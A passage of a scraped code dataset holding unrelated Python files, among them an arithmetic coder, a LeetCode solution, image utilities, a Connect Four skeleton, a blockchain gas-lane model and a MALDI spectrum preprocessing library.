ValueError('Probability not in range.')\n def read_encoded_bits(self):\n mask_bit_zero=self.mask_bit(0)\n mask_bit_one=self.mask_bit(1)\n while True:\n if(self._upper^~self._lower)&mask_bit_zero:\n pass\n elif(~self._upper&self._lower)&mask_bit_one:\n self._lower&=~(mask_bit_zero|mask_bit_one)\n self._upper|=mask_bit_one\n self._code^=mask_bit_one\n else:\n return\n self._lower&=MSB_MASK\n self._lower<<=1\n self._upper&=MSB_MASK\n self._upper<<=1\n self._upper|=1\n self._code&=MSB_MASK\n self._code<<=1\n try:\n next_bit=self._infile.get_bit()\n except EOFError:\n pass\n except:\n raise\n else:\n self._code|=next_bit\nimport os\nimport filecmp\nimport tempfile\nimport unittest\nclass EncodeDirTest(unittest.TestCase):\n def setUp(self):\n self.dir=os.listdir('.')\n makesuffix=tempfile._RandomNameSequence()\n self.encoded=tempfile.gettempprefix()+next(makesuffix)\n self.decoded=tempfile.gettempprefix()+next(makesuffix)\n while self.encoded in self.dir:\n self.encoded=tempfile.gettempprefix()+next(makesuffix)\n while self.decoded in self.dir:\n self.decoded=tempfile.gettempprefix()+next(makesuffix)\n self.ar=ArithmeticCode()\n def tearDown(self):\n del self.ar\n if os.path.isfile(self.encoded):\n os.remove(self.encoded)\n if os.path.isfile(self.decoded):\n os.remove(self.decoded)\n def test_static(self):\n print('\\nTests Using Static Model:')\n for src in self.dir:\n if os.path.isfile(src):\n print('\\tEncoding',src)\n self.ar.__init__(True)\n self.ar.encode_file(src,self.encoded)\n print('\\tDecoding',src)\n self.ar.__init__(True)\n self.ar.decode_file(self.encoded,self.decoded)\n self.assertTrue(filecmp.cmp(src,self.decoded),'Failed to Verify {0}'.format(src))\n os.remove(self.encoded)\n os.remove(self.decoded)\n def test_adaptive(self):\n print('\\nTests Using Adaptive Model:')\n for src in self.dir:\n if os.path.isfile(src):\n print('\\tEncoding',src)\n self.ar.__init__(False)\n self.ar.encode_file(src,self.encoded)\n print('\\tDecoding',src)\n self.ar.__init__(False)\n self.ar.decode_file(self.encoded,self.decoded)\n self.assertTrue(filecmp.cmp(src,self.decoded),'Failed to Verify {0}'.format(src))\n os.remove(self.encoded)\n os.remove(self.decoded)\nif __name__==\"__main__\":\n unittest.main()\n","repo_name":"catb0t/projects-backup","sub_path":"py/arithcoding/arcode-0.1/arcode/arcode.py","file_name":"arcode.py","file_ext":"py","file_size_in_byte":9212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891106128","text":"import bisect\n\n\nclass Solution:\n def maxScore(self, nums1: list[int], nums2: list[int], k: int) -> int:\n pairs = [(n1, n2) for n1, n2 in zip(nums1, nums2)]\n pairs.sort(key = lambda x: x[1], reverse=True)\n \n my_heap = []\n for i in range(k):\n bisect.insort(my_heap, pairs[i][0])\n \n heap_sum = sum(my_heap)\n max_score = heap_sum * pairs[k-1][1]\n for i in range(k, len(pairs)):\n curr_val = pairs[i][0]\n curr_min = pairs[i][1]\n bisect.insort(my_heap, curr_val)\n heap_sum += curr_val - my_heap.pop(0)\n max_score = max(max_score, heap_sum * curr_min)\n \n return max_score\n \n \nif __name__ == '__main__':\n sol = Solution()\n print('12 ===', sol.maxScore(nums1 = [1,3,3,2], nums2 = [2,1,3,4], k = 3))\n print('30 ===', sol.maxScore(nums1 = [4,2,3,1,1], nums2 = [7,5,10,9,6], k = 1))\n ","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/maximum_subsequence_score_2542.py","file_name":"maximum_subsequence_score_2542.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34660746130","text":"import numpy as np\nimport open3d as o3d\nfrom skimage.color import rgb2hsv\n\nimport WoundSegLib.HelperFunctions as F\n\n\nclass PickedPointSet:\n \"\"\"\n Container to hold a set of user (or given) 'picked' points. These points typically picked from the UI typically\n only contain the vertex index. This class extends that to easily retrieve color and statistical information from\n those points\n \"\"\"\n\n # noinspection PyTypeChecker\n def __init__(pp, pickedPointIndexes: np.ndarray, mesh: o3d.geometry.TriangleMesh, self):\n\n pp.indexes: np.ndarray = pickedPointIndexes\n pp.coordinates: np.ndarray = np.asarray(mesh.vertices)[pickedPointIndexes]\n pp.RGB: np.ndarray = np.asarray(mesh.vertex_colors)[pickedPointIndexes]\n pp.pointCount: int = len(pickedPointIndexes)\n\n pp.__HSV_STORED: np.ndarray = None\n pp.__RGBHSV_STORED: np.ndarray = None\n pp.__coordinatesQuartiles_STORED: np.ndarray = None\n pp.__RGBQuartiles_STORED: np.ndarray = None\n pp.__HSVQuartiles_STORED: np.ndarray = None\n pp.self = self\n \n def __GetHSV(pp) -> np.ndarray:\n \"\"\"\n Returns HSV Array in order of point indexes\n\n Returns\n -------\n TYPE np.ndarray of dimensions [(number of verts) x 3].\n\n \"\"\"\n if pp.__HSV_STORED is None:\n pp.__HSV_STORED = (rgb2hsv(pp.RGB))\n return pp.__HSV_STORED\n \n def __GetRGBQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns quartile 1, 2, 3 for each color channel\n\n Returns\n -------\n 2D array\n R_Q1, R_Q2, R_Q3\n G_Q1...\n\n \"\"\"\n if pp.__RGBQuartiles_STORED is None:\n R: np.ndarray = F.StatsGet123_Quartiles(pp.RGB[:, 0])\n G: np.ndarray = F.StatsGet123_Quartiles(pp.RGB[:, 1])\n B: np.ndarray = F.StatsGet123_Quartiles(pp.RGB[:, 2])\n pp.__RGBQuartiles_STORED = np.vstack((R, G, B))\n return pp.__RGBQuartiles_STORED\n\n def __GetRGBHSV(pp) -> np.ndarray:\n \"\"\"\n Returns 6 x N array of R, G, B, H, S, V channel data\n\n Returns\n -------\n 2D array\n R G B H S V\n ... number of vertices down ...\n \"\"\"\n if pp.__RGBHSV_STORED is None:\n pp.__RGBHSV_STORED = np.hstack([pp.RGB, pp.HSV])\n return pp.__RGBHSV_STORED\n\n def __GetHSVQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns quartile 1, 2, 3 for each color channel\n\n Returns\n -------\n 2D array\n H_Q1, H_Q2, H_Q3\n S_Q1...\n\n \"\"\"\n if pp.__HSVQuartiles_STORED is None:\n H: np.ndarray = F.StatsGet123_Quartiles(pp.HSV[:, 0])\n S: np.ndarray = F.StatsGet123_Quartiles(pp.HSV[:, 1])\n V: np.ndarray = F.StatsGet123_Quartiles(pp.HSV[:, 2])\n pp.__HSVQuartiles_STORED = np.vstack((H, S, V))\n return pp.__HSVQuartiles_STORED\n \n def __GetRGBHSVQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns Quartiles 1, 2, 3 for every color channel\n Returns\n -------\n 2D array\n R_Q1, R_Q2, R_Q3\n G_Q1...\n B_Q1...\n H_Q1...\n \"\"\"\n return np.vstack([pp.RGB_Quartiles, pp.HSV_Quartiles]) # since inputs are always small, no need to cache\n\n def __GetCoordQuartiles(pp) -> np.ndarray:\n \"\"\"\n returns quartile 1, 2, 3 for each XYZ channel in stored coordinate\n\n Returns\n -------\n 2D array\n X_Q1, X_Q2, X_Q3\n Y_Q1...\n\n \"\"\"\n if pp.__coordinatesQuartiles_STORED is None:\n X: np.ndarray = F.StatsGet123_Quartiles((pp.coordinates[:, 0]))\n Y: np.ndarray = F.StatsGet123_Quartiles((pp.coordinates[:, 1]))\n Z: np.ndarray = F.StatsGet123_Quartiles((pp.coordinates[:, 2]))\n\n pp.__coordinatesQuartiles_STORED = np.vstack((X, Y, Z))\n return pp.__coordinatesQuartiles_STORED\n\n def GetSpecificChannel(pp, channel: int or str) -> np.ndarray:\n \"\"\"\n Returns a specific color channel\n\n Parameters\n ----------\n channel : int or str\n The channel you want to retrieve\n\n Returns\n -------\n np.ndarrray\n 1D array of color channel data\n\n \"\"\"\n\n intIndex: int = F.IntOrStringToColorInt(channel)\n return pp.RGBHSV[:, intIndex]\n\n def GetSpecificChannelQuartiles(pp, channel: int or str) -> np.ndarray:\n \"\"\"\n Returns a specific color statistics np.ndarray by int index\n\n Parameters\n ----------\n channel : int\n 0-2 for RGB, 3-5 for HSV. Channel string name can be used instead as well\n\n Returns\n -------\n Color stats: np.ndarray\n Q1 Q2 Q3 stats for a channel.\n\n \"\"\"\n\n intIndex: int = F.IntOrStringToColorInt(channel)\n return pp.RGBHSV_Quartiles[intIndex, :]\n\n \n HSV = property(fget=__GetHSV)\n RGBHSV = property(fget=__GetRGBHSV)\n coordinate_Quartiles = property(fget=__GetCoordQuartiles)\n RGB_Quartiles = property(fget=__GetRGBQuartiles)\n HSV_Quartiles = property(fget=__GetHSVQuartiles)\n RGBHSV_Quartiles = property(fget=__GetRGBHSVQuartiles)\n","repo_name":"Amir-Rasteg/Segmentation-Library","sub_path":"WoundSegLib/PickedPointsSet.py","file_name":"PickedPointsSet.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"543841976","text":"import random\nimport cv2\nimport numpy as np\n\n\ndef get_image_path():\n import tkinter as tk\n from tkinter import filedialog\n # Create a root window\n root = tk.Tk()\n root.withdraw()\n # Create a file dialog box and get the selected file path\n file_path = filedialog.askopenfilename()\n # Print the selected file path\n print(\"Selected file path:\", file_path)\n return file_path\n\n\ndef get_image_bytes(path):\n with open(path, 'rb') as f:\n byte_im = f.read()\n return byte_im\n\n\ndef display_image(image_bytes, name):\n image_array = np.frombuffer(image_bytes, dtype=np.uint8)\n image = cv2.imdecode(image_array, cv2.IMREAD_COLOR)\n if image is None:\n # Create a random image\n height, width = 480, 640\n image = np.zeros((height, width, 3), dtype=np.uint8)\n image[:, :, :] = [random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)]\n # Display the random image\n cv2.imshow(name, image)\n else:\n # Display the decoded image\n cv2.imshow(name, image)\n # Wait for a key press and then close the window\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef write_to_dir(directory, image):\n with open(directory + '.jpg', 'wb') as f:\n f.write(image)\n\n\ndef image_list(path):\n images = [get_image_bytes(path+str(x)+'.jpg') for x in range(0, 100)]\n return images\n","repo_name":"moaz310/Blowfish_image","sub_path":"image_tools.py","file_name":"image_tools.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40289969246","text":"from board import *\nfrom userinterface import Player\nfrom models import NeuralNetwork\n\nclass Game():\n\n def __init__(self, player1, player2):\n self.board = Board()\n if isinstance(player1, NeuralNetwork) or isinstance(player1, Player):\n if isinstance(player2, NeuralNetwork) or isinstance(player2, Player):\n self.player1 = player1\n self.player2 = player2\n self.turn = True\n else:\n raise ValueError(\"Player2 is not a valid opponent type!\")\n else:\n raise ValueError(\"Player1 is not a valid opponent type!\")\n\n def generate_board_info(self):\n return self.board.matrix\n\n #Will prompt the next player to make a move, then return whether a win has occurred and the last player to make a move\n def next_turn(self):\n if self.turn: #Player1's turn\n move = self.player1.prompt_turn(generate_board_info())\n else: #Player2's turn\n move = self.player2.prompt_turn(generate_board_info())\n self.turn = not self.turn\n","repo_name":"TheTerrior/ConnectFourAI_DEAD","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12783097181","text":"N = int(input())\r\narr = [list(map(int, input().split())) for _ in range(N)]\r\nwhite, blue = 0, 0\r\n\r\ndef cutting(sr, sc, N):\r\n global white, blue\r\n # 들어온 구역의 모든 원소를 합해보기\r\n section_sum = sum(sum(arr[i][sc:sc+N]) for i in range(sr, sr+N))\r\n\r\n # 종료조건\r\n if not section_sum:\r\n white += 1\r\n return\r\n elif section_sum == N ** 2:\r\n blue += 1\r\n return\r\n\r\n # 더 쪼개야 할 때\r\n else:\r\n cutting(sr, sc, N//2)\r\n cutting(sr, sc+N//2, N//2)\r\n cutting(sr+N//2, sc, N//2)\r\n cutting(sr+N//2, sc+N//2, N//2)\r\n\r\n\r\ncutting(0, 0, N)\r\nprint(white)\r\nprint(blue)\r\n","repo_name":"baebaemin/Solved_Algorithm","sub_path":"백준/Silver/2630. 색종이 만들기/색종이 만들기.py","file_name":"색종이 만들기.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18555414853","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is the message module\n\"\"\"\nimport numpy as np\nimport params \n\nenv_params = params.env_params()\nN_lanes = env_params['N_lanes']\n\nclass Message:\n def __init__(self, ID: str, gas_fee_cap: list, gas_premium: list, opcode_list: list, params: list = None):\n \"\"\"\n Represents a message included in the blockchain.\n\n Args:\n ID (str): The identifier for the message.\n gas_fee_cap (float): The maximum fee that the sender is willing to pay.\n gas_premium (float): The additional fee that the sender is willing to pay to get the transaction included\n in a block quickly.\n opcode_list (list): List of opcode instances representing the operations in the message.\n params (list, optional): Additional parameters for the message. Defaults to None.\n \"\"\"\n self.ID = ID\n self.gas_fee_cap = gas_fee_cap\n self.gas_premium = gas_premium\n self.opcode_list = opcode_list\n self.gas_used = self.get_gas_used()\n self.gas_limit = self.calculate_gas_limit()\n self.params = params\n\n def get_gas_used(self) -> list:\n \"\"\"\n Calculates the total gas used for each lane by summing up the gas used by each opcode in the opcode list.\n\n Returns:\n list: The gas used for each lane.\n \"\"\"\n gas_used = [ 0 for i in range(N_lanes)]\n for opcode in self.opcode_list:\n if len(gas_used)>1:\n lane = opcode.belongs_to_lane\n else:\n lane=0\n gas_used[lane] += opcode.gas_used\n\n return gas_used\n\n def calculate_gas_limit(self) ->list:\n \"\"\"\n Calculates the gas limit for each lane by adding a random factor to the gas used.\n\n Returns:\n list: The calculated gas limit for each lane.\n \"\"\"\n gas_limit = [ 0 for i in range(N_lanes)]\n\n for l in range(N_lanes):\n overestimation_factor=(1 + 0.2*np.random.random())\n gas_limit[l]=int(self.gas_used[l]*overestimation_factor)\n\n return gas_limit\n \nif __name__ == '__main__':\n from opcodes import Opcode\n\n opcode1 = Opcode(1, \"ADD\")\n opcode2 = Opcode(2, \"SUB\")\n opcode3 = Opcode(3, \"MUL\")\n opcode4 = Opcode(4, \"foreign_opcode\", 100)\n\n opcode_list = [opcode1, opcode2, opcode3, opcode4]\n MESSAGE_NAME = 'msg1'\n message1 = Message(MESSAGE_NAME, [100.0,100], [50.0,50], opcode_list)\n print(f'Message {MESSAGE_NAME} has a gas usage of {message1.gas_used} and a gas limit of {message1.gas_limit}')\n","repo_name":"juanpmcianci/IC3-Hackathon-gas-lanes","sub_path":"src/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72237840253","text":"from scipy.signal import savgol_filter\nfrom scipy import sparse\nfrom scipy.linalg import norm\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import binned_statistic\nfrom maldi_nn.utils import topf\nimport matplotlib.pyplot as plt\nimport h5torch\nimport torch\n\n\nclass SpectrumObject:\n \"\"\"Base Spectrum Object class\n\n Can be instantiated directly with 1-D np.arrays for mz and intensity.\n Alternatively, can be read from csv files or from bruker output data.\n Reading from Bruker data is based on the code in https://github.com/sgibb/readBrukerFlexData\n\n Parameters\n ----------\n mz : 1-D np.array, optional\n mz values, by default None\n intensity : 1-D np.array, optional\n intensity values, by default None\n \"\"\"\n\n def __init__(self, mz=None, intensity=None):\n self.mz = mz\n self.intensity = intensity\n if self.intensity is not None:\n if np.issubdtype(self.intensity.dtype, np.unsignedinteger):\n self.intensity = self.intensity.astype(int)\n if self.mz is not None:\n if np.issubdtype(self.mz.dtype, np.unsignedinteger):\n self.mz = self.mz.astype(int)\n\n def __getitem__(self, index):\n return SpectrumObject(mz=self.mz[index], intensity=self.intensity[index])\n\n def __len__(self):\n if self.mz is not None:\n return self.mz.shape[0]\n else:\n return 0\n\n def plot(self, as_peaks=False):\n \"\"\"Plot a spectrum via matplotlib\n\n Parameters\n ----------\n as_peaks : bool, optional\n draw points in the spectrum as individualpeaks, instead of connecting the points in the spectrum, by default False\n \"\"\"\n if as_peaks:\n mz_plot = np.stack([self.mz - 1, self.mz, self.mz + 1]).T.reshape(-1)\n int_plot = np.stack(\n [\n np.zeros_like(self.intensity),\n self.intensity,\n np.zeros_like(self.intensity),\n ]\n ).T.reshape(-1)\n else:\n mz_plot, int_plot = self.mz, self.intensity\n plt.plot(mz_plot, int_plot)\n\n def __repr__(self):\n string_ = np.array2string(\n np.stack([self.mz, self.intensity]), precision=5, threshold=10, edgeitems=2\n )\n mz_string, int_string = string_.split(\"\\n\")\n mz_string = mz_string[1:]\n int_string = int_string[1:-1]\n return \"SpectrumObject([\\n\\tmz = %s,\\n\\tint = %s\\n])\" % (mz_string, int_string)\n\n @staticmethod\n def tof2mass(ML1, ML2, ML3, TOF):\n A = ML3\n B = np.sqrt(1e12 / ML1)\n C = ML2 - TOF\n\n if A == 0:\n return (C * C) / (B * B)\n else:\n return ((-B + np.sqrt((B * B) - (4 * A * C))) / (2 * A)) ** 2\n\n @classmethod\n def from_bruker(cls, acqu_file, fid_file):\n \"\"\"Read a spectrum from Bruker's format\n\n Parameters\n ----------\n acqu_file : str\n \"acqu\" file bruker folder\n fid_file : str\n \"fid\" file in bruker folder\n\n Returns\n -------\n SpectrumObject\n \"\"\"\n with open(acqu_file, \"rb\") as f:\n lines = [line.decode(\"utf-8\", errors=\"replace\").rstrip() for line in f]\n for l in lines:\n if l.startswith(\"##$TD\"):\n TD = int(l.split(\"= \")[1])\n if l.startswith(\"##$DELAY\"):\n DELAY = int(l.split(\"= \")[1])\n if l.startswith(\"##$DW\"):\n DW = float(l.split(\"= \")[1])\n if l.startswith(\"##$ML1\"):\n ML1 = float(l.split(\"= \")[1])\n if l.startswith(\"##$ML2\"):\n ML2 = float(l.split(\"= \")[1])\n if l.startswith(\"##$ML3\"):\n ML3 = float(l.split(\"= \")[1])\n if l.startswith(\"##$BYTORDA\"):\n BYTORDA = int(l.split(\"= \")[1])\n if l.startswith(\"##$NTBCal\"):\n NTBCal = l.split(\"= \")[1]\n\n intensity = np.fromfile(fid_file, dtype={0: \"i\"}[BYTORDA])\n\n if len(intensity) < TD:\n TD = len(intensity)\n TOF = DELAY + np.arange(TD) * DW\n\n mass = cls.tof2mass(ML1, ML2, ML3, TOF)\n\n intensity[intensity < 0] = 0\n\n return cls(mz=mass, intensity=intensity)\n\n @classmethod\n def from_tsv(cls, file, sep=\" \"):\n \"\"\"Read a spectrum from txt\n\n Parameters\n ----------\n file : str\n path to csv file\n sep : str, optional\n separator in the file, by default \" \"\n\n Returns\n -------\n SpectrumObject\n \"\"\"\n s = pd.read_table(\n file, sep=sep, index_col=None, comment=\"#\", header=None\n ).values\n mz = s[:, 0]\n intensity = s[:, 1]\n return cls(mz=mz, intensity=intensity)\n\n def torch(self):\n \"\"\"Converts spectrum to dict of tensors\"\"\"\n return {\"mz\": torch.tensor(self.mz), \"intensity\": torch.tensor(self.intensity)}\n\n\nclass Binner:\n \"\"\"Pre-processing function for binning spectra in equal-width bins.\n\n Parameters\n ----------\n start : int, optional\n start of the binning range, by default 2000\n stop : int, optional\n end of the binning range, by default 20000\n step : int, optional\n width of every bin, by default 3\n aggregation : str, optional\n how to aggregate intensity values in each bin.\n Is passed to the statistic argument of https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.binned_statistic.html\n Can take any argument that the statistic argument also takes, by default \"sum\"\n \"\"\"\n\n def __init__(self, start=2000, stop=20000, step=3, aggregation=\"sum\"):\n self.bins = np.arange(start, stop + 1e-8, step)\n self.mz_bins = self.bins[:-1] + step / 2\n self.agg = aggregation\n\n def __call__(self, SpectrumObj):\n if self.agg == \"sum\":\n bins, _ = np.histogram(\n SpectrumObj.mz, self.bins, weights=SpectrumObj.intensity\n )\n else:\n bins = binned_statistic(\n SpectrumObj.mz,\n SpectrumObj.intensity,\n bins=self.bins,\n statistic=self.agg,\n ).statistic\n bins = np.nan_to_num(bins)\n\n s = SpectrumObject(intensity=bins, mz=self.mz_bins)\n return s\n\n\nclass Normalizer:\n \"\"\"Pre-processing function for normalizing the intensity of a spectrum.\n Commonly referred to as total ion current (TIC) calibration.\n\n Parameters\n ----------\n sum : int, optional\n Make the total intensity of the spectrum equal to this amount, by default 1\n \"\"\"\n\n def __init__(self, sum=1):\n self.sum = sum\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject()\n\n s = SpectrumObject(\n intensity=SpectrumObj.intensity / SpectrumObj.intensity.sum() * self.sum,\n mz=SpectrumObj.mz,\n )\n return s\n\n\nclass Trimmer:\n \"\"\"Pre-processing function for trimming ends of a spectrum.\n This can be used to remove inaccurate measurements.\n\n Parameters\n ----------\n min : int, optional\n remove all measurements with mz's lower than this value, by default 2000\n max : int, optional\n remove all measurements with mz's higher than this value, by default 20000\n \"\"\"\n\n def __init__(self, min=2000, max=20000):\n self.range = [min, max]\n\n def __call__(self, SpectrumObj):\n indices = (self.range[0] < SpectrumObj.mz) & (SpectrumObj.mz < self.range[1])\n\n s = SpectrumObject(\n intensity=SpectrumObj.intensity[indices], mz=SpectrumObj.mz[indices]\n )\n return s\n\n\nclass VarStabilizer:\n \"\"\"Pre-processing function for manipulating intensities.\n Commonly performed to stabilize their variance.\n\n Parameters\n ----------\n method : str, optional\n function to apply to intensities.\n can be either \"sqrt\", \"log\", \"log2\" or \"log10\", by default \"sqrt\"\n \"\"\"\n\n def __init__(self, method=\"sqrt\"):\n methods = {\"sqrt\": np.sqrt, \"log\": np.log, \"log2\": np.log2, \"log10\": np.log10}\n self.fun = methods[method]\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(intensity=self.fun(SpectrumObj.intensity), mz=SpectrumObj.mz)\n return s\n\n\nclass BaselineCorrecter:\n \"\"\"Pre-processing function for baseline correction (also referred to as background removal).\n\n Support SNIP, ALS and ArPLS.\n Some of the code is based on https://stackoverflow.com/questions/29156532/python-baseline-correction-library.\n\n Parameters\n ----------\n method : str, optional\n Which method to use\n either \"SNIP\", \"ArPLS\" or \"ALS\", by default None\n als_lam : float, optional\n lambda value for ALS and ArPLS, by default 1e8\n als_p : float, optional\n p value for ALS and ArPLS, by default 0.01\n als_max_iter : int, optional\n max iterations for ALS and ArPLS, by default 10\n als_tol : float, optional\n stopping tolerance for ALS and ArPLS, by default 1e-6\n snip_n_iter : int, optional\n iterations of SNIP, by default 10\n \"\"\"\n\n def __init__(\n self,\n method=None,\n als_lam=1e8,\n als_p=0.01,\n als_max_iter=10,\n als_tol=1e-6,\n snip_n_iter=10,\n ):\n self.method = method\n self.lam = als_lam\n self.p = als_p\n self.max_iter = als_max_iter\n self.tol = als_tol\n self.n_iter = snip_n_iter\n\n def __call__(self, SpectrumObj):\n if \"LS\" in self.method:\n baseline = self.als(\n SpectrumObj.intensity,\n method=self.method,\n lam=self.lam,\n p=self.p,\n max_iter=self.max_iter,\n tol=self.tol,\n )\n elif self.method == \"SNIP\":\n baseline = self.snip(SpectrumObj.intensity, self.n_iter)\n\n s = SpectrumObject(\n intensity=SpectrumObj.intensity - baseline, mz=SpectrumObj.mz\n )\n return s\n\n def als(self, y, method=\"ArPLS\", lam=1e8, p=0.01, max_iter=10, tol=1e-6):\n L = len(y)\n D = sparse.diags([1, -2, 1], [0, -1, -2], shape=(L, L - 2))\n D = lam * D.dot(\n D.transpose()\n ) # Precompute this term since it does not depend on `w`\n\n w = np.ones(L)\n W = sparse.spdiags(w, 0, L, L)\n\n crit = 1\n count = 0\n while crit > tol:\n z = sparse.linalg.spsolve(W + D, w * y)\n\n if method == \"AsLS\":\n w_new = p * (y > z) + (1 - p) * (y < z)\n elif method == \"ArPLS\":\n d = y - z\n dn = d[d < 0]\n m = np.mean(dn)\n s = np.std(dn)\n w_new = 1 / (1 + np.exp(np.minimum(2 * (d - (2 * s - m)) / s, 70)))\n\n crit = norm(w_new - w) / norm(w)\n w = w_new\n W.setdiag(w)\n count += 1\n if count > max_iter:\n break\n return z\n\n def snip(self, y, n_iter):\n y_prepr = np.log(np.log(np.sqrt(y + 1) + 1) + 1)\n for i in range(1, n_iter + 1):\n rolled = np.pad(y_prepr, (i, i), mode=\"edge\")\n new = np.minimum(\n y_prepr, (np.roll(rolled, i) + np.roll(rolled, -i))[i:-i] / 2\n )\n y_prepr = new\n return (np.exp(np.exp(y_prepr) - 1) - 1) ** 2 - 1\n\n\nclass Smoother:\n \"\"\"Pre-processing function for smoothing. Uses Savitzky-Golay filter.\n\n Parameters\n ----------\n halfwindow : int, optional\n halfwindow of savgol_filter, by default 10\n polyorder : int, optional\n polyorder of savgol_filter, by default 3\n \"\"\"\n\n def __init__(self, halfwindow=10, polyorder=3):\n self.window = halfwindow * 2 + 1\n self.poly = polyorder\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=np.maximum(\n savgol_filter(SpectrumObj.intensity, self.window, self.poly), 0\n ),\n mz=SpectrumObj.mz,\n )\n return s\n\n\nclass PersistenceTransformer:\n \"\"\"Pre-processing function for Peak Detection.\n Uses the Persistance Transformation first outlined in https://doi.org/10.1093/bioinformatics/btaa429\n Underlying code is from https://github.com/BorgwardtLab/Topf\n\n Parameters\n ----------\n extract_nonzero : bool, optional\n whether to extract detected peaks or to keep zeros in, by default False\n \"\"\"\n\n def __init__(self, extract_nonzero=False):\n self.filter = extract_nonzero\n\n def __call__(self, SpectrumObj):\n a = np.stack([SpectrumObj.mz, SpectrumObj.intensity]).T\n b = topf.PersistenceTransformer().fit_transform(a)\n\n s = SpectrumObject()\n if self.filter:\n peaks = b[:, 1] != 0\n s = SpectrumObject(intensity=b[peaks, 1], mz=b[peaks, 0])\n else:\n s = SpectrumObject(intensity=b[:, 1], mz=b[:, 0])\n return s\n\n\nclass PeakFilter:\n \"\"\"Pre-processing function for filtering peaks.\n\n Filters in two ways: absolute number of peaks and height.\n\n Parameters\n ----------\n max_number : int, optional\n Maximum number of peaks to keep. Prioritizes peaks to keep by height.\n by default None, for no filtering\n min_intensity : float, optional\n Min intensity of peaks to keep, by default None, for no filtering\n \"\"\"\n\n def __init__(self, max_number=None, min_intensity=None):\n self.max_number = max_number\n self.min_intensity = min_intensity\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(intensity=SpectrumObj.intensity, mz=SpectrumObj.mz)\n\n if self.max_number is not None:\n indices = np.argsort(-s.intensity, kind=\"stable\")\n take = np.sort(indices[: self.max_number])\n\n s.mz = s.mz[take]\n s.intensity = s.intensity[take]\n\n if self.min_intensity is not None:\n take = s.intensity >= self.min_intensity\n\n s.mz = s.mz[take]\n s.intensity = s.intensity[take]\n\n return s\n\n\nclass RandomPeakShifter:\n \"\"\"Pre-processing function for adding random (gaussian) noise to the mz values of peaks.\n\n Parameters\n ----------\n std : float, optional\n stdev of the random noise to add, by default 1\n \"\"\"\n\n def __init__(self, std=1.0):\n self.std = std\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=SpectrumObj.intensity,\n mz=SpectrumObj.mz\n + np.random.normal(scale=self.std, size=SpectrumObj.mz.shape),\n )\n return s\n\n\nclass UniformPeakShifter:\n \"\"\"Pre-processing function for adding uniform noise to the mz values of peaks.\n\n Parameters\n ----------\n range : float, optional\n let each peak shift by maximum this value, by default 1.5\n \"\"\"\n\n def __init__(self, range=1.5):\n self.range = range\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=SpectrumObj.intensity,\n mz=SpectrumObj.mz\n + np.random.uniform(\n low=-self.range, high=self.range, size=SpectrumObj.mz.shape\n ),\n )\n return s\n\n\nclass Binarizer:\n \"\"\"Pre-processing function for binarizing intensity values of peaks.\n\n Parameters\n ----------\n threshold : float\n Threshold for the intensities to become 1 or 0.\n \"\"\"\n\n def __init__(self, threshold):\n self.threshold = threshold\n\n def __call__(self, SpectrumObj):\n s = SpectrumObject(\n intensity=(SpectrumObj.intensity > self.threshold).astype(\n SpectrumObj.intensity.dtype\n ),\n mz=SpectrumObj.mz,\n )\n return s\n\n\nclass SequentialPreprocessor:\n \"\"\"Chain multiple preprocessors so that a pre-processing pipeline can be called with one line.\n\n Example:\n ```python\n preprocessor = SequentialPreprocessor(\n VarStabilizer(),\n Smoother(),\n BaselineCorrecter(method=\"SNIP\"),\n Normalizer(),\n Binner()\n )\n preprocessed_spectrum = preprocessor(spectrum)\n ```\n \"\"\"\n\n def __init__(self, *args):\n self.preprocessors = args\n\n def __call__(self, SpectrumObj):\n for step in self.preprocessors:\n SpectrumObj = step(SpectrumObj)\n return SpectrumObj\n","repo_name":"gdewael/maldi-nn","sub_path":"maldi_nn/spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":16427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19416572684","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\nPython implementation of BlastLine, an alternative Cython implementation is\navailable in .cblast.BlastLine, which may be up to 2x faster\n\"\"\"\n\n\nclass BlastLine(object):\n __slots__ = (\n \"query\",\n \"subject\",\n \"pctid\",\n \"hitlen\",\n \"nmismatch\",\n \"ngaps\",\n \"qstart\",\n \"qstop\",\n \"sstart\",\n \"sstop\",\n \"evalue\",\n \"score\",\n \"qseqid\",\n \"sseqid\",\n \"qi\",\n \"si\",\n \"orientation\",\n )\n\n def __init__(self, sline):\n args = sline.split(\"\\t\")\n self.query = args[0]\n self.subject = args[1]\n self.pctid = float(args[2])\n self.hitlen = int(args[3])\n self.nmismatch = int(args[4])\n self.ngaps = 